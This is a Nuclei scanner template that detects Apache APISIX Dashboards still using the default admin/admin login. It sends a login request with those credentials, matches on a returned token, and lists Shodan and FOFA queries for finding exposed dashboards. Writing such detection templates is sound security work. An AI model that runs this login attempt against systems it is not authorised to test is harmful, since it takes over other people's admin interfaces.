id: apisix-default-login

info:
  name: Apache Apisix Default Admin Login
  author: pdteam
  severity: high
  description: An Apache Apisix default admin login was discovered.
  reference:
    - https://apisix.apache.org/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    shodan-query: title:"Apache APISIX Dashboard"
    fofa-query: title="Apache APISIX Dashboard"
    product: https://apisix.apache.org
  tags: apisix,apache,default-login

requests:
  - raw:
      - |
        POST /apisix/admin/user/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Authorization:
        Content-Type: application/json;charset=UTF-8

        {"username":"{{user}}","password":"{{pass}}"}

    attack: pitchfork
    payloads:
      user:
        - admin
      pass:
        - admin

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - '"data"'
          - '"token"'
          - '"code":0'
        condition: and

# Enhanced by mp on 2022/03/22
